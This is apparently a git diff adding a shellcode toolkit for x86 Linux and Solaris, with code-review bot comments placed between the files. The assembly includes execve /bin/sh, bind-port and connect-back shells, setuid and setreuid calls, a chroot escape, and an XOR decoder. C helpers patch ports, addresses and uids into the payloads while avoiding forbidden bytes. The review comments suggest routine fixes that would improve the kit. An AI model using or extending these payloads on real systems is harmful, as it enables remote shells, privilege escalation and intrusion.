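+{
+ switch (x) {
+ case 0x00:
+ case 0x0a:
+ case 0x0d:
+ case 0x25:
+ return 0;
+ }
+ return 1;
+}
+
+
+unsigned short int
+getxorer (unsigned short int value)
+{
+ unsigned short int xor = 0x8f8f, temp;
+
+
+ temp = (xor ^ value) & 0xff00;
+ switch (temp) {
+ case 0x0000 :
+ case 0x0a00 :
+ case 0x0d00 :
+ case 0x2500 : xor^=0x8000;
+ break;
+ }
+
+ temp = (xor ^ value) & 0xff;
+ switch (temp) {
+ case 0x00 :
+ case 0x0a :
+ case 0x0d :
+ case 0x25 : xor^=0x80;
+ break;
+ }
+
+ return xor;
+}
+
+
+unsigned long int
+getxorer4 (unsigned long int v)
+{
+ unsigned long int xor = 0x8f8f8f8f,
+ temp,
+ x;
+
+
+ for (x = 0; x < 4; x++) {
+ temp = ((xor ^ v) >> (x * 8)) & 0xff;
+ if (!isLegal (temp)) {
+ xor ^= (0x80 << (x * 8));
+ }
+ }
+
+ return xor;
+}
+
+
+void
+x86_linux_chmod_setup (unsigned char *code, unsigned char *file,
+ unsigned long int mode)
+{
+ unsigned char length = 0;
+
+
+ length = strlen (file);
+ if (length > 255 || !isLegal (length)) {
+ printf ("Change length of file name. code will be left unchanged.\n");
+ return;
+ }
+ code[7] = length;
+
+/* XXX: WRITE ME! */
+
+ return;
+}
+
+
+void
+x86_linux_setgid_setup (unsigned char *code, unsigned short int gid)
+{
+ unsigned short xor = 0;
+
+
+ xor = getxorer (gid);
+
+ code[10] = xor & 0xff;
+ code[11] = (xor >> 8) & 0xff;
+
+ gid ^= xor;
+
+ code[5] = gid & 0xff;
+ code[6] = (gid >> 8) & 0xff;
+
+ return;
+}
+
+
+void
+x86_linux_setuid_setup (unsigned char *code, unsigned short int uid)
+{
+ unsigned short xor = 0;
+
+
+ xor = getxorer (uid);
+
+ code[10] = xor & 0xff;
+ code[11] = (xor >> 8) & 0xff;
+
+ uid ^= xor;
+
+ code[5] = uid & 0xff;
+ code[6] = (uid >> 8) & 0xff;
+
+ return;
+}
+
+
+void
+x86_linux_setreuid_setup (unsigned char *code,
+ unsigned short int ruid, unsigned short int euid)
+{
+ unsigned short xor_a = 0,
+ xor_b = 0;
+
+
+ xor_a = getxorer (ruid);
+ xor_b = getxorer (euid);
+
+ code[10] = xor_a & 0xff;
+ code[11] = (xor_a >> 8) & 0xff;
+
+ code[19] = xor_b & 0xff;
+ code[20] = (xor_b >> 8) & 0xff;
+
+ ruid ^= xor_a;
+ euid ^= xor_b;
+
+ code[5] = ruid & 0xff;
+ code[6] = (ruid >> 8) & 0xff;
+
+ code[14] = euid & 0xff;
+ code[15] = (euid >> 8) & 0xff;
+
+ return;
+}
+
+
+void
+x86_linux_portshell_setup (unsigned char *code, unsigned short int port)
+{
+ port = htons (port);
+
+ if (!isLegal(port & 0xff) || !isLegal((port & 0xff00) >> 8)) {
+ printf ("Error:\t choosen port would produced illegal bytes.\n");
+ printf ("\t code will be left unchanged.\n");
+ return;
+ }
+
+ code[22] = (port >> 8) & 0xff;
+ code[21] = port & 0xff;
+
+ return;
+}
+
+
+void
+x86_linux_connectshell_setup (unsigned char *code,
+ unsigned long int raddr,
+ unsigned short int rport)
+{
+ unsigned long int raddr_xor = 0;
+
+
+ rport = htons (rport);
+ if (!isLegal(rport & 0xff) || !isLegal((rport & 0xff00) >> 8)) {
+ printf ("Error:\t choosen remote port would produced illegal bytes.\n");
+ printf ("\t code will be left unchanged.\n");
+
+ return;
+ }
+
+ raddr_xor = getxorer4 (raddr);
+
+ raddr ^= raddr_xor;
+
+ code[22] = (raddr_xor >> 24) & 0xff;
+ code[21] = (raddr_xor >> 16) & 0xff;
+ code[20] = (raddr_xor >> 8) & 0xff;
+ code[19] = raddr_xor & 0xff;
+
+ code[28] = (raddr >> 24) & 0xff;
+ code[27] = (raddr >> 16) & 0xff;
+ code[26] = (raddr >> 8) & 0xff;
+ code[25] = raddr & 0xff;
+
+ code[33] = (rport >> 8) & 0xff;
+ code[32] = rport & 0xff;
+
+ return;
+}
+
+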
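Review bot: In getxorer4, `xor ^= (0x80 << (x * 8));` shifts the int constant 0x80 by 24 on the last iteration, which overflows a signed int and is undefined behaviour in C; on LP64 the wrapped value is then converted into the unsigned long and only the callers' `& 0xff` masking hides the extra high bits. Use an unsigned constant of the right width: `xor ^= (0x80UL << (x * 8));`. In x86_linux_chmod_setup the strlen result is stored into the `unsigned char length` before the `length > 255` test, so that test can never be true and an overlong name silently wraps; compute into a `size_t` first, compare that, and only then narrow. The `mode` parameter is unused there, consistent with the `/* XXX: WRITE ME! */` marker, so a comment on the function should state that it currently only patches the length byte.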
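diff --git a/other/shellkit/x86_linux.h b/other/shellkit/x86_linux.h
new file mode 100644
index 0000000..a145c34
--- /dev/null
+++ b/other/shellkit/x86_linux.h
@@ -0,0 +1,32 @@
+
+#ifndef X86_LINUX_H
+#define X86_LINUX_H
+
+#include "x86.h"
+#include "shellcode.h"
+
+arch x86_linux;
+
+
+void
+x86_linux_chmod_setup (unsigned char *, unsigned char *, unsigned long int);
+
+void
+x86_linux_setgid_setup (unsigned char *, unsigned short int);
+
+void
+x86_linux_setuid_setup (unsigned char *, unsigned short int);
+
+void
+x86_linux_setreuid_setup (unsigned char *,
+ unsigned short int, unsigned short int);
+
+void
+x86_linux_portshell_setup (unsigned char *, unsigned short int);
+
+void
+x86_linux_connectshell_setup (unsigned char *,
+ unsigned long int, unsigned short int);
+
+#endif
+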
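Review bot: `arch x86_linux;` on line 8 of x86_linux.h is a tentative definition, not a declaration, so every translation unit that includes this header emits its own `x86_linux` object; that links only while the toolchain merges common symbols and fails with duplicate-symbol errors under `-fno-common`, which is the GCC default since version 10. Declare it instead: `extern arch x86_linux;`, leaving the single definition in x86_linux.c. The function prototypes below it are fine as written.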
diff --git a/other/shellkit/x86_linux.o b/other/shellkit/x86_linux.o
new file mode 100644
index 0000000..d992733
--- /dev/null
+++ b/other/shellkit/x86_linux.o
Binary files differ
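diff --git a/other/shellkit/x86_linux/AUTHORS b/other/shellkit/x86_linux/AUTHORS
new file mode 100644
index 0000000..e5ad29f
--- /dev/null
+++ b/other/shellkit/x86_linux/AUTHORS
@@ -0,0 +1,5 @@
+files by:
+palmers / teso
+
+changed by:
+lorian / teso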
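diff --git a/other/shellkit/x86_linux/chmod.s b/other/shellkit/x86_linux/chmod.s
new file mode 100644
index 0000000..63efd8b
--- /dev/null
+++ b/other/shellkit/x86_linux/chmod.s
@@ -0,0 +1,23 @@
+
+ .globl cbegin
+ .globl cend
+
+
+cbegin:
+ jmp file
+
+chmod:
+ xorl %eax, %eax
+ popl %ebx
+ movb %al, 0x4(%ebx)
+ movl $0x41414141, %ecx
+
+ movb $0xf, %al
+ int $0x80
+
+file:
+ call chmod
+ .ascii ""
+
+cend:
+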
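diff --git a/other/shellkit/x86_linux/chroot.s b/other/shellkit/x86_linux/chroot.s
new file mode 100644
index 0000000..dd7e878
--- /dev/null
+++ b/other/shellkit/x86_linux/chroot.s
@@ -0,0 +1,34 @@
+ .globl cbegin
+ .globl cend
+
+
+cbegin:
+/* mkdir AA.. */
+ cdq
+ movl $0x73507350, %ecx
+ push %eax
+ push $0x2e2e4141
+ movl %esp, %ebx
+ movb $0x27, %al
+ int $0x80
+
+/* chroot AA.. */
+ movb $0x3d, %al
+ int $0x80
+
+/* chdir .. x 5 */
+ addb $0x2, %bl
+
+cd_loop:
+ incb %dl
+ movb $0xc, %al
+ int $0x80
+ cmp $0x6a, %dl
+ jne cd_loop
+
+/* chroot . */
+ incb %bl
+ movb $0x3d, %al
+ int $0x80
+cend:
+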
diff --git a/other/shellkit/x86_linux/codedump b/other/shellkit/x86_linux/codedump
new file mode 100644
index 0000000..fe9bb8e
--- /dev/null
+++ b/other/shellkit/x86_linux/codedump
Binary files differ
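diff --git a/other/shellkit/x86_linux/connect.s b/other/shellkit/x86_linux/connect.s
new file mode 100644
index 0000000..452a1d4
--- /dev/null
+++ b/other/shellkit/x86_linux/connect.s
@@ -0,0 +1,61 @@
+ .globl cbegin
+ .globl cend
+
+cbegin:
+
+/* socket */
+ xorl %eax, %eax
+ cdq
+ push %eax
+ incb %al
+ movl %eax, %ebx
+ push %eax
+ incb %al
+ push %eax
+ movl %esp, %ecx
+ movb $0x66, %al
+ int $0x80
+
+/* connect */
+ movl $0x41414141, %ecx
+ xorl $0x4041413e, %ecx /* address: 127.0.0.1 */
+ push %ecx
+ pushw $0x7450
+ pushw %dx
+ movl %esp, %ecx
+ movl %eax, %edx
+
+ push $0x10
+ push %ecx
+ push %edx
+ movl %esp, %ecx
+
+ movb $0x03, %bl
+ movb $0x66, %al
+ int $0x80
+
+/* dup2 fd 0 + fd 1 */
+ movl %edx, %ebx
+ xorl %ecx, %ecx
+
+ movb $0x3f, %al
+ int $0x80
+
+ incb %cl
+ movb $0x3f, %al
+ int $0x80
+
+/* execve shell (by lorian, see execve.s) - slightly modified */
+ movb $0x0b, %al
+ cdq
+ pushl %edx
+ push $0x68732F6E
+ push $0x69622F2F
+ movl %esp, %ebx
+ pushl %edx
+ pushl %ebx
+ movl %esp, %ecx
+ int $0x80
+
+cend:
+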
diff --git a/other/shellkit/x86_linux/execve b/other/shellkit/x86_linux/execve
new file mode 100644
index 0000000..3a17d3f
--- /dev/null
+++ b/other/shellkit/x86_linux/execve
Binary files differ
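diff --git a/other/shellkit/x86_linux/execve.s b/other/shellkit/x86_linux/execve.s
new file mode 100644
index 0000000..2fdb69f
--- /dev/null
+++ b/other/shellkit/x86_linux/execve.s
@@ -0,0 +1,22 @@
+/* x86/linux execve /bin/sh shellcode
+ *
+ * lorian / teso
+ */
+
+ .globl cbegin
+ .globl cend
+
+cbegin:
+ pushl $0x0b
+ popl %eax
+ cdq
+ pushl %edx
+ push $0x68732F6E
+ push $0x69622F2F
+ movl %esp, %ebx
+ pushl %edx
+ pushl %ebx
+ movl %esp, %ecx
+ int $0x80
+
+cend: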
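diff --git a/other/shellkit/x86_linux/exit.s b/other/shellkit/x86_linux/exit.s
new file mode 100644
index 0000000..1fe28f6
--- /dev/null
+++ b/other/shellkit/x86_linux/exit.s
@@ -0,0 +1,14 @@
+/* x86/linux exit shellcode
+ *
+ * lorian / teso
+ */
+ .globl cbegin
+ .globl cend
+
+cbegin:
+
+ xorl %eax, %eax
+ incl %eax
+ int $0x80
+
+cend: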
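diff --git a/other/shellkit/x86_linux/portshell.s b/other/shellkit/x86_linux/portshell.s
new file mode 100644
index 0000000..31aa68c
--- /dev/null
+++ b/other/shellkit/x86_linux/portshell.s
@@ -0,0 +1,73 @@
+ .globl cbegin
+ .globl cend
+
+cbegin:
+
+/* socket */
+ xorl %eax, %eax
+ cdq
+ push %eax
+ incb %al
+ movl %eax, %ebx
+ push %eax
+ incb %al
+ push %eax
+ movl %esp, %ecx
+ movb $0x66, %al
+ int $0x80
+
+/* bind */
+ push %edx
+ pushw $0x7350
+ pushw %dx
+ movl %esp, %edx
+
+ push $0x10
+ push %edx
+ push %eax
+ movl %esp, %ecx
+
+ incb %bl
+ movl %eax, %edx
+ movb $0x66, %al
+ int $0x80
+
+/* listen */
+ addb $0x02, %bl
+ movb $0x66, %al
+ int $0x80
+
+/* accept */
+ push %eax
+ push %edx
+ movl %esp, %ecx
+
+ incb %bl
+ movb $0x66, %al
+ int $0x80
+
+/* dup2 fd 0 + fd 1 */
+ movl %eax, %ebx
+ xorl %ecx, %ecx
+
+ movb $0x3f, %al
+ int $0x80
+
+ incb %cl
+ movb $0x3f, %al
+ int $0x80
+
+/* execve shell (by lorian, see execve.s) - slightly modified */
+ movb $0x0b, %al
+ cdq
+ pushl %edx
+ push $0x68732F6E
+ push $0x69622F2F
+ movl %esp, %ebx
+ pushl %edx
+ pushl %ebx
+ movl %esp, %ecx
+ int $0x80
+
+cend:
+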
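diff --git a/other/shellkit/x86_linux/portshell_slice.s b/other/shellkit/x86_linux/portshell_slice.s
new file mode 100644
index 0000000..0d4c7b1
--- /dev/null
+++ b/other/shellkit/x86_linux/portshell_slice.s
@@ -0,0 +1,77 @@
+ .globl cbegin
+ .globl cend
+
+cbegin:
+
+/* socket */
+ xorl %eax, %eax
+ cdq
+ push %eax
+ incb %al
+ movl %eax, %ebx
+ push %eax
+ incb %al
+ push %eax
+ movl %esp, %ecx
+ movb $0x66, %al
+ int $0x80
+
+/* bind */
+ push %edx
+ pushw $0x7350
+ pushw %dx
+ movl %esp, %edx
+
+ push $0x10
+ push %edx
+ push %eax
+ movl %esp, %ecx
+
+ incb %bl
+ movl %eax, %edx
+ movb $0x66, %al
+ int $0x80
+
+/* listen */
+ addb $0x02, %bl
+ movb $0x66, %al
+ int $0x80
+
+/* accept */
+ push %eax
+ push %edx
+ movl %esp, %ecx
+
+ incb %bl
+ movb $0x66, %al
+ int $0x80
+
+/* dup2 fd 0 + fd 1 */
+ movl %eax, %ebx
+ xorl %ecx, %ecx
+
+ movb $0x3f, %al
+ int $0x80
+
+ incb %cl
+ movb $0x3f, %al
+ int $0x80
+
+/* execve shell (by lorian, see execve.s) - slightly modified */
+ movb $0x0b, %al
+ cdq
+ pushl %edx
+/* push $0x68732F6E */
+/* push $0x69622F2F */
+ pushw $0x6873
+ pushw $0x2f6e
+ pushw $0x6962
+ pushw $0x2f2f
+ movl %esp, %ebx
+ pushl %edx
+ pushl %ebx
+ movl %esp, %ecx
+ int $0x80
+
+cend:
+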
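diff --git a/other/shellkit/x86_linux/read.s b/other/shellkit/x86_linux/read.s
new file mode 100644
index 0000000..870d125
--- /dev/null
+++ b/other/shellkit/x86_linux/read.s
@@ -0,0 +1,22 @@
+ .globl cbegin
+ .globl cend
+
+cbegin:
+ jmp cend
+
+rrr:
+ movb $0xfa, %dl /* length */
+
+ popl %ecx /* position */
+
+ push $0x41
+ pop %ebx
+ xorb $0x41, %bl
+
+ push $0x3
+ pop %eax
+ int $0x80 /* read */
+
+cend:
+ call rrr
+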
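diff --git a/other/shellkit/x86_linux/setgid.s b/other/shellkit/x86_linux/setgid.s
new file mode 100644
index 0000000..0786804
--- /dev/null
+++ b/other/shellkit/x86_linux/setgid.s
@@ -0,0 +1,14 @@
+ .globl cbegin
+ .globl cend
+
+cbegin:
+
+main:
+ pushb $0x2e
+ popl %eax
+ movw $0x4141, %ebx
+ xorw $0x4242, %ebx
+ int $0x80
+
+cend:
+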
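diff --git a/other/shellkit/x86_linux/setreuid.s b/other/shellkit/x86_linux/setreuid.s
new file mode 100644
index 0000000..c976312
--- /dev/null
+++ b/other/shellkit/x86_linux/setreuid.s
@@ -0,0 +1,16 @@
+ .globl cbegin
+ .globl cend
+
+cbegin:
+
+main:
+ pushl $0x46
+ popl %eax
+ movw $0x4141, %ebx
+ xorw $0x4141, %ebx
+ movw $0x4242, %ecx
+ xorw $0x4242, %ecx
+ int $0x80
+
+cend:
+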
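diff --git a/other/shellkit/x86_linux/setuid.s b/other/shellkit/x86_linux/setuid.s
new file mode 100644
index 0000000..e78410a
--- /dev/null
+++ b/other/shellkit/x86_linux/setuid.s
@@ -0,0 +1,14 @@
+ .globl cbegin
+ .globl cend
+
+cbegin:
+
+main:
+ pushb $0x17
+ popl %eax
+ movw $0x4141, %ebx
+ xorw $0x4242, %ebx
+ int $0x80
+
+cend:
+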
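diff --git a/other/shellkit/x86_linux/spset.s b/other/shellkit/x86_linux/spset.s
new file mode 100644
index 0000000..9bc19f4
--- /dev/null
+++ b/other/shellkit/x86_linux/spset.s
@@ -0,0 +1,36 @@
+/* x86 spset shellcode
+ *
+ * lorian / teso
+ */
+ .globl cbegin
+ .globl _cbegin
+ .globl cend
+ .globl _cend
+
+/* searches for 512 bytes "free" space on stack without destroying it
+ * like any kind of call would do...
+ *
+ * NOTE: your real shellcode must be terminated with
+ * \x78\x56\x34\x12 for this code to work...
+ */
+
+_cbegin:
+cbegin:
+
+ movl $0x12345678, %eax
+a:
+ cdq
+ movb $0x02, %dh
+b:
+ popl %ebx
+ pushl %ebx
+ incl %esp
+ decl %edx
+ jz c
+ cmpl %eax, %ebx
+ je a
+ jmp b
+c:
+
+_cend:
+cend: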
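diff --git a/other/shellkit/x86_linux/xor.s b/other/shellkit/x86_linux/xor.s
new file mode 100644
index 0000000..29e3b78
--- /dev/null
+++ b/other/shellkit/x86_linux/xor.s
@@ -0,0 +1,24 @@
+ .globl cbegin
+ .globl cend
+
+cbegin:
+ jmp XOR_down
+
+XOR_up:
+ popl %ebx
+ movb $0x26, %cl /* lenght */
+
+XORLoop:
+ xorb $0x64, %bl /* xor key */
+ incl %ebx
+ dec %cl
+ jnz XORLoop
+ jmp XORLoopDone
+
+XOR_down:
+ call XOR_up
+
+XORLoopDone:
+ .ascii ""
+
+cend: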
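diff --git a/other/shellkit/x86_noptest.c b/other/shellkit/x86_noptest.c
new file mode 100644
index 0000000..3c68ce0
--- /dev/null
+++ b/other/shellkit/x86_noptest.c
@@ -0,0 +1,25 @@
+
+#include <stdio.h>
+#include <stdlib.h>
+#include "shellcode.h"
+#include "x86_bsd.h"
+
+
+typedef void (* func_ptr)(void);
+
+int
+main (int argc, char *argv[])
+{
+ func_ptr fp;
+ unsigned char nopspace[20480];
+
+ x86_nop (nopspace, sizeof (nopspace), "\x25\x0d\x0a\x00", 4);
+ nopspace[sizeof (nopspace) - 1] = '\xcc';
+
+ fp = (func_ptr) nopspace;
+ fp ();
+
+ exit (EXIT_SUCCESS);
+}
+
+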
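Review bot: main jumps into `nopspace`, an automatic array on the stack, so the test depends on an executable stack and will die with SIGSEGV on any system that maps the stack non-executable; nothing in the file says so, and a crash here is easily misread as a defect in x86_nop. Add a comment above the `fp ()` call, e.g. `/* executes a stack buffer: needs an executable stack; a fault here is the platform's NX policy, not x86_nop */`, and note that the trailing `'\xcc'` (int3) is what stops execution once the filler has been run. `argc` and `argv` are unused, so `int main (void)` would be the cleaner signature.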
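diff --git a/other/shellkit/x86_solaris/README b/other/shellkit/x86_solaris/README
new file mode 100644
index 0000000..da1d06b
--- /dev/null
+++ b/other/shellkit/x86_solaris/README
@@ -0,0 +1,7 @@
+x86/solaris shellcodes
+
+lorian/teso
+
+all shellcodes are untested for now, cause i dont have a solaris x86
+system to test on. could be that they all dont work...
+will test as soon i install solaris x86 at home... (maybe within next week)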
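diff --git a/other/shellkit/x86_solaris/bindshell.s b/other/shellkit/x86_solaris/bindshell.s
new file mode 100644
index 0000000..1380747
--- /dev/null
+++ b/other/shellkit/x86_solaris/bindshell.s
@@ -0,0 +1,68 @@
+/* x86/BSD bindsh shellcode (89 bytes)
+
+ lorian / teso
+*/
+
+ .globl _cbegin
+ .globl cbegin
+ .globl _cend
+ .globl cend
+
+_cbegin:
+cbegin:
+ movl $0x3cfff8ff, %eax
+ notl %eax
+ pushl %eax
+ xorl %ebx, %ebx
+ mull %ebx
+ movb $0x9a, %al
+ pushl %eax
+ movl %esp, %ecx
+
+ pushl %ebx
+ incl %ebx
+ pushl %ebx
+ incl %ebx
+ pushl %ebx
+ movb $0xe6, %al
+ call *%ecx
+
+ xchgl %esi, %eax
+ pushl %edx
+ pushw $0x4444
+ pushw %bx
+ movl %esp, %ebp
+ pushl $0x10
+ pushl %ebp
+ pushl %esi
+ xorl %eax, %eax
+ movb $0xe8, %al
+ call *%ecx
+ movb $0xe9, %al
+ call *%ecx
+ pusha
+ popl %edi
+ movb $0xea, %al
+ call *%ecx
+a:
+ pushl %ebx
+ pushl %eax
+ movb $0x3e, %al
+ call *%ecx
+ decl %ebx
+ jns a
+ pushl %edx
+ push $0x68732F6E
+ push $0x69622F2F
+ movl %esp, %ebx
+ pushl %edx
+ pushl %ebx
+ movl %esp, %edi
+ pushl %edx
+ pushl %edi
+ pushl %ebx
+ movb $0x3b, %al
+ call *%ecx
+
+_cend:
+cend: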
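Review bot: The header comment on line 1 reads `x86/BSD bindsh shellcode (89 bytes)`, but the file lives under x86_solaris and, like its sibling connectsh.s, enters the kernel through `call *%ecx` rather than the `int $0x80` used by the x86_bsd files, so the description looks like a copy-paste leftover from the BSD variant. Change it to `/* x86/solaris bindsh shellcode (89 bytes)`. The README in the same directory states these codes are untested; that caveat belongs in this header as well so the file is self-describing.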
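diff --git a/other/shellkit/x86_solaris/connectsh.s b/other/shellkit/x86_solaris/connectsh.s
new file mode 100644
index 0000000..155015a
--- /dev/null
+++ b/other/shellkit/x86_solaris/connectsh.s
@@ -0,0 +1,60 @@
+/* x86/solaris connectsh shellcode (83 bytes)
+
+ lorian / teso
+*/
+
+ .globl _cbegin
+ .globl cbegin
+ .globl _cend
+ .globl cend
+
+_cbegin:
+cbegin:
+ movl $0x3cfff8ff, %eax
+ notl %eax
+ pushl %eax
+ xorl %ebp, %ebp
+ mull %ebp
+ movb $0x9a, %al
+ pushl %eax
+ movl %esp, %ecx
+
+ pushl %ebp
+ incl %ebp
+ pushl %ebp
+ incl %ebp
+ pushl %ebp
+ movb $0xe6, %al
+ call *%ecx
+ xchgl %esi, %eax
+ pushl $0xcab058c3
+ pushw $0x4444
+ pushw %bp
+ movl %esp, %edi
+ pushl $0x10
+ pushl %edi
+ pushl %esi
+ xorl %eax, %eax
+ movb $0xeb, %al
+ call *%ecx
+a: pusha
+ pop %esi
+ movb $0x3e, %al
+ call *%ecx
+ decl %ebp
+ jns a
+ pushl %edx
+ push $0x68732F6E
+ push $0x69622F2F
+ movl %esp, %ebx
+ pushl %edx
+ pushl %ebx
+ movl %esp, %edi
+ pushl %edx
+ pushl %edi
+ pushl %ebx
+ movb $0x3b, %al
+ call *%ecx
+
+_cend:
+cend: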
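diff --git a/other/shellkit/x86_solaris/execve.s b/other/shellkit/x86_solaris/execve.s
new file mode 100644
index 0000000..428a2fe
--- /dev/null
+++ b/other/shellkit/x86_solaris/execve.s
@@ -0,0 +1,32 @@
+/* x86/solaris execve /bin/sh shellcode
+ *
+ * lorian / teso
+ */
+
+ .globl cbegin
+ .globl cend
+
+cbegin:
+ movl $0x3cfff8ff, %eax
+ notl %eax
+ pushl %eax
+ xorl %eax, %eax
+ cdq
+ movb $0x9a, %al
+ pushl %eax
+ movl %esp, %edi
+
+ movb $0x3b, %al
+ pushl %edx
+ push $0x68732F6E
+ push $0x69622F2F
+ movl %esp, %ebx
+ pushl %edx
+ pushl %ebx
+ movl %esp, %ecx
+ pushl %edx
+ pushl %ecx
+ pushl %ebx
+ call *%edi
+
+cend: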
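diff --git a/other/shellkit/x86_solaris/exit.s b/other/shellkit/x86_solaris/exit.s
new file mode 100644
index 0000000..d332c6f
--- /dev/null
+++ b/other/shellkit/x86_solaris/exit.s
@@ -0,0 +1,24 @@
+/* x86/solaris exit shellcode
+ *
+ * lorian / teso
+ */
+ .globl cbegin
+ .globl _cbegin
+ .globl cend
+ .globl _cend
+
+_cbegin:
+cbegin:
+ movl $0x3cfff8ff, %eax
+ notl %eax
+ pushl %eax
+ xorl %eax, %eax
+ movb $0x9a, %al
+ pushl %eax
+ movl %esp, %edi
+ movb $0x01, %al
+ call *%edi
+
+
+_cend:
+cend: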